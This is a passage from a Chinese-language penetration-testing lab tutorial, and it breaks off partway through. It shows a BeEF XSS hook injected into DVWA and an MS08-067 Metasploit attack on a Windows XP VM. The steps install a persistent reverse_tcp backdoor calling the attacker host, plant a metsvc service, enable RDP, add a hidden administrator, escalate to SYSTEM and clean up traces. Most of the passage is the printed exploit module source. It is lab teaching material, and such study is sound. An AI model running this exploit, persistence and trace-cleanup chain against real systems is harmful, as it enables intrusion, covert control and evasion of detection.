            # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
            continue_after_timeout: true
    
        # Enables DNS lookups on zombie IP addresses
        dns_hostname_lookup: false
    
        # IP Geolocation
        geoip:
            enable: true
            # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
            database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
    
        # Integration with PhishingFrenzy
        # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
        # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
        integration:
            phishing_frenzy:
                enable: false
    
        # You may override default extension configuration parameters here
        # Note: additional experimental extensions are available in the 'extensions' directory
        #       and can be enabled via their respective 'config.yaml' file
        extension:
            admin_ui:
                enable: true
                base_path: "/ui"
            demos:
                enable: true
            events:
                enable: true
            evasion:
                enable: false
            requester:
                enable: true
            proxy:
                enable: true
            network:
                enable: true
            metasploit:
                enable: false
            social_engineering:
                enable: true
            xssrays:
                enable: true
    

    修改user和password后启动Beef

    ./beef
    

    提示信息先标记一下

    [22:56:06][*] running on network interface: 10.10.10.128
    [22:56:06]    |   Hook URL: http://10.10.10.128:3000/hook.js
    [22:56:06]    |_  UI URL:   http://10.10.10.128:3000/ui/panel
    [22:56:06][*] RESTful API key: b2400041e8e3f03c5ee4adcf8ca5cb5e620edd04
    [22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
    [22:56:06][*] HTTP Proxy: http://127.0.0.1:6789
    [22:56:06][*] BeEF server started (press control+c to stop)
    

    里面含有hook信息

    Hook URL: http://10.10.10.128:3000/hook.js
    

    因此构造的javascript脚本应为

    <script src="http://10.10.10.128:3000/hook.js"></script>
    

    访问Beef控制台

    http://127.0.0.1:3000/ui/panel
    

    在这里插入图片描述在这里插入图片描述
    设置DVWA Security为Low后选择XSS reflected,输入javascript代码点击Submit
    在这里插入图片描述能够看到主机信息
    在这里插入图片描述其中Location根据报错信息需要GeoIP,可在我的资源中下载

    [22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
    

    在这里插入图片描述
    备注:跨站脚本攻击在互联网上攻击需要有互联网IP地址

    网络服务渗透

    MS08067

    search ms08_067
    
    msf6 > search ms08_067
    
    Matching Modules
    ================
    
       #  Name                                 Disclosure Date  Rank   Check  Description
       -  ----                                 ---------------  ----   -----  -----------
       0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
    
    use exploit/windows/smb/ms08_067_netapi
    set payload windows/meterpreter/bind_tcp
    set RHOST 192.168.10.128
    set LPORT 5000
    set LHOST 10.10.10.128
    set target 7
    exploit
    
    msf6 exploit(windows/smb/ms08_067_netapi) > exploit
    
    [*] 192.168.10.128:445 - Attempting to trigger the vulnerability...
    [*] Started bind TCP handler against 192.168.10.128:5000
    [*] Sending stage (175174 bytes) to 192.168.10.128
    [*] Meterpreter session 1 opened (192.168.10.1:2231 -> 192.168.10.128:5000 ) at 2022-04-16 11:42:28 +0800
    
    meterpreter > sysinfo
    Computer        : DH-CA8822AB9589
    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
    Architecture    : x86
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x86/windows
    

    添加开机启动项,当开机时连接攻击主机10.10.10.128的443端口

    run persistence -X -i 5 -p 443 -r 10.10.10.128
    
    meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128
    
    [!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
    [!] Example: run exploit/windows/local/persistence OPTION=value [...]
    [*] Running Persistence Script
    [*] Resource file for cleanup created at C:/Users/IDEA/.msf4/logs/persistence/DH-CA8822AB9589_20220417.5804/DH-CA8822AB9589_20220417.5804.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443
    [*] Persistent agent script is 99622 bytes long
    [+] Persistent Script written to C:\WINDOWS\TEMP\GbwkRkc.vbs
    [*] Executing script C:\WINDOWS\TEMP\GbwkRkc.vbs
    [+] Agent executed with PID 4044
    [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
    [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
    

    当攻击目标重启后可从已有后门连接已攻击完成主机

    use exploit/multi/handler
    set payload windows/meterpreter/bind_tcp
    set LHOST 10.10.10.128
    set LPORT 443
    exploit
    
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
    payload => windows/meterpreter/bind_tcp
    msf6 exploit(multi/handler) > set LHOST 10.10.10.128
    LHOST => 10.10.10.128
    msf6 exploit(multi/handler) > set LPORT 443
    LPORT => 443
    msf6 exploit(multi/handler) > exploit
    
    [*] Started bind TCP handler against :443
    

    使用metsvc将Meterpreter以系统服务的形式安装到目标主机

    run metsvc
    
    meterpreter > run metsvc
    
    [!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
    [!] Example: run exploit/windows/local/persistence OPTION=value [...]
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory C:\WINDOWS\TEMP\uIaJuExSqtDr...
    [*]  >> Uploading metsrv.x86.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
             * Installing service metsvc
     * Starting service
    Service metsvc successfully installed.
    
    meterpreter >
    

    开启目标主机远程桌面并添加用户账户

    run post/windows/manage/enable_rdp
    
    meterpreter > run post/windows/manage/enable_rdp
    
    [*] Enabling Remote Desktop
    [*]     RDP is disabled; enabling it ...
    [*] Setting Terminal Services service startup mode
    [*]     The Terminal Services service is not set to auto, changing it to auto ...
    [*]     Opening port in local firewall if necessary
    [*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    

    在WinXP Metasploitable中可以看到远程桌面已开启
    在这里插入图片描述

    run getgui -u metasploit -p meterpreter
    
    meterpreter > run getgui -u metasploit -p meterpreter
    
    [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
    [!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
    [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
    [*] Carlos Perez carlos_perez@darkoperator.com
    [*] Setting user account for logon
    [*]     Adding User: metasploit with Password: meterpreter
    [*]     Hiding user from Windows Login screen
    [*]     Adding User: metasploit to local group 'Remote Desktop Users'
    [*]     Adding User: metasploit to local group 'Administrators'
    [*] You can now login with the created user
    [*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
    

    在WinXP Metasploitable中可以看到添加的用户情况
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    获取权限

    getsystem
    

    查看当前权限

    getuid
    

    system权限是系统的最高权限

    提示信息,在操作完成后,执行C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc清除痕迹,关闭痕迹和删除添加的账号

    [*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
    
    run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
    
    meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
    [*] Running Command List ...
    [*]     Running command execute -H -f cmd.exe -a "/c net user metasploit /delete"
    Process 2956 created.
    [*]     Running command reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList -v metasploit
    Successfully deleted metasploit.
    

    刷新用户,在WinXP Metasploitable中可以看到添加的用户现已消失
    在这里插入图片描述提示信息,在操作完成后,执行C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt清除痕迹,关闭远程桌面

    [*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    
    run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    
    meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    [*] Running Command List ...
    [*]     Running command reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
    Successfully set fDenyTSConnections of REG_SZ.
    [*]     Running command execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
    Process 3264 created.
    [*]     Running command execute -H -f cmd.exe -a "/c sc stop termservice"
    Process 2880 created.
    [*]     Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
    Process 3180 created.
    

    在WinXP Metasploitable中可以看到远程桌面已关闭
    在这里插入图片描述

    查看MS08067源代码

    exploit/windows/smb/ms08_067_netapi
    
    C:\metasploit-framework\embedded\framework\modules\exploits\windows\smb\ms08_067_netapi.rb
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = GreatRanking
    
      include Msf::Exploit::Remote::DCERPC
      include Msf::Exploit::Remote::SMB::Client
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
          'Description'    => %q{
              This module exploits a parsing flaw in the path canonicalization code of
            NetAPI32.dll through the Server Service. This module is capable of bypassing
            NX on some operating systems and service packs. The correct target must be
            used to prevent the Server Service (along with a dozen others in the same
            process) from crashing. Windows XP targets seem to handle multiple successful
            exploitation events, but 2003 targets will often crash or hang on subsequent
            attempts. This is just the first version of this module, full support for
            NX bypass on 2003, along with other platforms, is still in development.
          },
          'Author'         =>
            [
              'hdm', # with tons of input/help/testing from the community
              'Brett Moore <brett.moore[at]insomniasec.com>',
              'frank2 <frank2[at]dc949.org>', # check() detection
              'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              %w(CVE 2008-4250),
              %w(OSVDB 49243),
              %w(MSB MS08-067),
              # If this vulnerability is found, ms08-67 is exposed as well
              ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
            ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'thread',
            },
          'Privileged'     => true,
          'Payload'        =>
            {
              'Space'    => 408,
              'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
              'Prepend'  => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
              'StackAdjustment' => -3500,
    
            },
          'Platform'       => 'win',
          'DefaultTarget'  => 0,
          'Targets'        =>
            [
              #
              # Automatic targetting via fingerprinting
              #
              ['Automatic Targeting', { 'auto' => true }],
    
              #
              # UNIVERSAL TARGETS
              #
    
              #
              # Antoine's universal for Windows 2000
              # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
              #
              ['Windows 2000 Universal',
               {
                 'Ret'       => 0x001f1cb0,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP EDI SVCHOST.EXE
    
              #
              # Standard return-to-ESI without NX bypass
              # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
              #
              ['Windows XP SP0/SP1 Universal',
               {
                 'Ret'       => 0x01001361,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI SVCHOST.EXE
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP0 Universal',
               {
                 'Ret'       => 0x0100129e,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI SVCHOST.EXE
    
              #
              # ENGLISH TARGETS
              #
    
              # jduck's AlwaysOn NX Bypass for XP SP2
              ['Windows XP SP2 English (AlwaysOn NX)',
               {
                 # No pivot is needed, we drop into our rop
                 'Scratch' => 0x00020408,
                 'UseROP'  => '5.1.2600.2180'
               }
              ],
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 English (NX)',
               {
                 'Ret'       => 0x6f88f727,
                 'DisableNX' => 0x6f8916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # jduck's AlwaysOn NX Bypass for XP SP3
              ['Windows XP SP3 English (AlwaysOn NX)',
               {
                 # No pivot is needed, we drop into our rop
                 'Scratch' => 0x00020408,
                 'UseROP'  => '5.1.2600.5512'
               }
              ],
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 English (NX)',
               {
                 'Ret'       => 0x6f88f807,
                 'DisableNX' => 0x6f8917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              #
              # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
              #
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Arabic (NX)',
               {
                 'Ret'       => 0x6fd8f727,
                 'DisableNX' => 0x6fd916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
               {
                 'Ret'       => 0x5860f727,
                 'DisableNX' => 0x586116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Chinese - Simplified (NX)',
               {
                 'Ret'       => 0x58fbf727,
                 'DisableNX' => 0x58fc16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Chinese - Traditional (NX)',
               {
                 'Ret'       => 0x5860f727,
                 'DisableNX' => 0x586116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Czech (NX)',
               {
                 'Ret'       => 0x6fe1f727,
                 'DisableNX' => 0x6fe216e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Danish (NX)',
               {
                 'Ret'       => 0x5978f727,
                 'DisableNX' => 0x597916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 German (NX)',
               {
                 'Ret'       => 0x6fd9f727,
                 'DisableNX' => 0x6fda16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Greek (NX)',
               {
                 'Ret'       => 0x592af727,
                 'DisableNX' => 0x592b16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Spanish (NX)',
               {
                 'Ret'       => 0x6fdbf727,
                 'DisableNX' => 0x6fdc16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Finnish (NX)',
               {
                 'Ret'       => 0x597df727,
                 'DisableNX' => 0x597e16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 French (NX)',
               {
                 'Ret'       => 0x595bf727,
                 'DisableNX' => 0x595c16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Hebrew (NX)',
               {
                 'Ret'       => 0x5940f727,
                 'DisableNX' => 0x594116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Hungarian (NX)',
               {
                 'Ret'       => 0x5970f727,
                 'DisableNX' => 0x597116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Italian (NX)',
               {
                 'Ret'       => 0x596bf727,
                 'DisableNX' => 0x596c16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Japanese (NX)',
               {
                 'Ret'       => 0x567fd3be,
                 'DisableNX' => 0x568016e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Korean (NX)',
               {
                 'Ret'       => 0x6fd6f727,
                 'DisableNX' => 0x6fd716e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Dutch (NX)',
               {
                 'Ret'       => 0x596cf727,
                 'DisableNX' => 0x596d16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Norwegian (NX)',
               {
                 'Ret'       => 0x597cf727,
                 'DisableNX' => 0x597d16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Polish (NX)',
               {
                 'Ret'       => 0x5941f727,
                 'DisableNX' => 0x594216e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Portuguese - Brazilian (NX)',
               {
                 'Ret'       => 0x596ff727,
                 'DisableNX' => 0x597016e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Portuguese (NX)',
               {
                 'Ret'       => 0x596bf727,
                 'DisableNX' => 0x596c16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Russian (NX)',
               {
                 'Ret'       => 0x6fe1f727,
                 'DisableNX' => 0x6fe216e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Swedish (NX)',
               {
                 'Ret'       => 0x597af727,
                 'DisableNX' => 0x597b16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Turkish (NX)',
               {
                 'Ret'       => 0x5a78f727,
                 'DisableNX' => 0x5a7916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Arabic (NX)',
               {
                 'Ret'       => 0x6fd8f807,
                 'DisableNX' => 0x6fd917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
               {
                 'Ret'       => 0x5860f807,
                 'DisableNX' => 0x586117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Chinese - Simplified (NX)',
               {
                 'Ret'       => 0x58fbf807,
                 'DisableNX' => 0x58fc17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Chinese - Traditional (NX)',
               {
                 'Ret'       => 0x5860f807,
                 'DisableNX' => 0x586117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Czech (NX)',
               {
                 'Ret'       => 0x6fe1f807,
                 'DisableNX' => 0x6fe217c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Danish (NX)',
               {
                 'Ret'       => 0x5978f807,
                 'DisableNX' => 0x597917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 German (NX)',
               {
                 'Ret'       => 0x6fd9f807,
                 'DisableNX' => 0x6fda17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Greek (NX)',
               {
                 'Ret'       => 0x592af807,
                 'DisableNX' => 0x592b17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Spanish (NX)',
               {
                 'Ret'       => 0x6fdbf807,
                 'DisableNX' => 0x6fdc17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Finnish (NX)',
               {
                 'Ret'       => 0x597df807,
                 'DisableNX' => 0x597e17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 French (NX)',
               {
                 'Ret'       => 0x595bf807,
                 'DisableNX' => 0x595c17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Hebrew (NX)',
               {
                 'Ret'       => 0x5940f807,
                 'DisableNX' => 0x594117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Hungarian (NX)',
               {
                 'Ret'       => 0x5970f807,
                 'DisableNX' => 0x597117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Italian (NX)',
               {
                 'Ret'       => 0x596bf807,
                 'DisableNX' => 0x596c17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Japanese (NX)',
               {
                 'Ret'       => 0x567fd4d2,
                 'DisableNX' => 0x568017c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Korean (NX)',
               {
                 'Ret'       => 0x6fd6f807,
                 'DisableNX' => 0x6fd717c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Dutch (NX)',
               {
                 'Ret'       => 0x596cf807,
                 'DisableNX' => 0x596d17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Norwegian (NX)',
               {
                 'Ret'       => 0x597cf807,
                 'DisableNX' => 0x597d17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Polish (NX)',
               {
                 'Ret'       => 0x5941f807,
                 'DisableNX' => 0x594217c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Portuguese - Brazilian (NX)',
               {
                 'Ret'       => 0x596ff807,
                 'DisableNX' => 0x597017c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Portuguese (NX)',
               {
                 'Ret'       => 0x596bf807,
                 'DisableNX' => 0x596c17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Russian (NX)',
               {
                 'Ret'       => 0x6fe1f807,
                 'DisableNX' => 0x6fe217c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Swedish (NX)',
               {
                 'Ret'       => 0x597af807,
                 'DisableNX' => 0x597b17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Turkish (NX)',
               {
                 'Ret'       => 0x5a78f807,
                 'DisableNX' => 0x5a7917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              #
              # Windows 2003 Targets
              #
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP1 English (NO NX)',
               {
                 'Ret'       => 0x71bf21a2,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP1
              ['Windows 2003 SP1 English (NX)',
               {
                 'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
                 'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP1 Japanese (NO NX)',
               {
                 'Ret'       => 0x71a921a2,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP1 Spanish (NO NX)',
               {
                 'Ret'       => 0x71ac21a2,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP1
              ['Windows 2003 SP1 Spanish (NX)',
               {
                 'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
                 'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
              # Standard return-to-ESI without NX bypass
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP1 French (NO NX)',
                {
                  'Ret'       => 0x71ac1c40 ,
